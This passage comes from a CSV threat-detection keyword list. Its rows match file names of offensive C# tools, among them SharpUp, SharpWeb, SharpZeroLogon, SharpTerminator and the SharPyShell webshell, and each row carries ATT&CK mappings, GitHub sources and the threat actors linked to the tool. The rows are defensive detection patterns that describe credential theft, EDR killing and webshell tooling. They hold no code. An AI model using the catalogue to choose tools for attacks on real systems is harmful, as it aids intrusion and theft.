TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18723" "*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18724" "*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18725" "*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18726" "*\SharpTask.exe*",".{0,1000}\\SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18727" "*\SharpTerminator.csproj*",".{0,1000}\\SharpTerminator\.csproj.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","18728" "*\SharpThief\*",".{0,1000}\\SharpThief\\.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","18729" "*\SharpThief-main*",".{0,1000}\\SharpThief\-main.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense 
Evasion","https://github.com/INotGreen/SharpThief","1","0","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","18730" "*\SharpTokenFinder.exe*",".{0,1000}\\SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18731" "*\SharpUp.csproj*",".{0,1000}\\SharpUp\.csproj.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18732" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18733" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18734" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18735" "*\SharpUp.exe*",".{0,1000}\\SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18736" "*\SharpUp.pdb*",".{0,1000}\\SharpUp\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18737" "*\SharpUp.pdb*",".{0,1000}\\SharpUp\.pdb.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18738" "*\SharpUp.sln*",".{0,1000}SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18739" "*\SharpUp\*",".{0,1000}\\SharpUp\\.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18740" "*\SharpUp-master*",".{0,1000}\\SharpUp\-master.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18741" "*\SharpVeeamDecryptor-*",".{0,1000}\\SharpVeeamDecryptor\-.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","18742" "*\SharpVeeamDecryptor.*",".{0,1000}\\SharpVeeamDecryptor\..{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","18743" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18744" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - 
TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18745" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18746" "*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18747" "*\SharpView.pdb*",".{0,1000}\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - 
TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18748" "*\SharpView.pdb*",".{0,1000}\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18749" "*\SharpWeb.dll*",".{0,1000}\\SharpWeb\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18750" "*\SharpWeb.exe*",".{0,1000}\\SharpWeb\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18751" "*\SharpWeb.exe*",".{0,1000}\\SharpWeb\.exe.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","18752" "*\SharpWeb.sln*",".{0,1000}\\SharpWeb\.sln.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","18753" "*\SharpWebScan.exe*",".{0,1000}\\SharpWebScan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18754" "*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - 
T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18755" "*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18756" "*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18757" "*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 
- T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18758" "*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18759" "*\sharpwmi.exe*",".{0,1000}\\sharpwmi\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18760" "*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - 
T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18761" "*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18762" "*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18763" "*\SharpWSManWinRM.cs*",".{0,1000}\\SharpWSManWinRM\.cs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","18764" "*\SharpWSManWinRM.vbs*",".{0,1000}\\SharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","18765" "*\SharpXDecrypt.exe*",".{0,1000}\\SharpXDecrypt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18766" "*\SharPyShell*",".{0,1000}\\SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","18767" "*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - 
T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18768" "*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18769" "*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
